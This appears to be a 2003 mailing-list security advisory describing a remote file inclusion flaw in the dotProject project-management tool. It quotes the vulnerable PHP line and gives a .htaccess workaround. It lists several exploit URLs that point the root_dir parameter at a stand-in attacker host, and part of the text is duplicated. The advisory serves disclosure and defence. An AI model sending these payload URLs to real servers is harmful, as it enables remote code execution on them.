dotproject is a PHP+MySQL beta level web based project management and tracking tool
that dotmarketing started in Dec. 2000.
Inside the directory /modules/ multiple files try to include classdefs/date.php
without defining $root_dir first and allow remote attackers to inject their own
servers if globals are set on.
Example Code from modules/projects/addedit.php:
******
<?php
##
## Files modules: index page re-usable sub-table
##
http://victim/dotproject/modules/projects/addedit.php?root_dir=http://at
tacker
http://victim/dotproject/modules/projects/view.php?root_dir=http://attac
ker
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://a
ttacker
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attac
ker
http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://att
acker
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /modules/ directory and that should block remote users from accessing it.
dotproject Remote Code Execution Vulnerability (By Mindwarper)
<------- ------->
----------------------
Vendor Information:
----------------------
Homepage : http://www.dotproject.net
Vendor : informed
Mailed advisory: 28/01/03
Vender Response : None
----------------------
Affected Versions:
----------------------
dev20030121
----------------------
Vulnerability:
----------------------
dotproject is a PHP+MySQL beta level web based project management and tracking tool
that dotmarketing started in Dec. 2000.
Inside the directory /modules/ multiple files try to include classdefs/date.php
without defining $root_dir first and allow remote attackers to inject their own
servers if globals are set on.
Example Code from modules/projects/addedit.php:
******
<?php
##
## Files modules: index page re-usable sub-table
##
require_once( "$root_dir/classdefs/date.php" );
$df = $AppUI->getPref('SHDATEFORMAT');
$tf = $AppUI->getPref('TIMEFORMAT');
******
As you can see nothing happens before the require_once function is called and therefore
with globals set on an attacker may include remote files.
Example:
http://victim/dotproject/modules/files/index_table.php?root_dir=http://a
ttacker
this works also on
http://victim/dotproject/modules/projects/addedit.php?root_dir=http://at
tacker
http://victim/dotproject/modules/projects/view.php?root_dir=http://attac
ker
http://victim/dotproject/modules/projects/vw_files.php?root_dir=http://a
ttacker
http://victim/dotproject/modules/tasks/addedit.php?root_dir=http://attac
ker
http://victim/dotproject/modules/tasks/viewgantt.php?root_dir=http://att
acker
----------------------
Solution:
----------------------
Please check the vendor's website for new patches.
As a temporary solution, create a .htaccess file that contains 'Deny from all'.
Place it in the /modules/ directory and that should block remote users from accessing it.
----------------------
Contact:
----------------------
Name: Mindwarper
Email: mindwarper (at) hush (dot) com [email concealed]
Website: http://mindlock.bestweb.net
<------- ------->
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
[ reply ]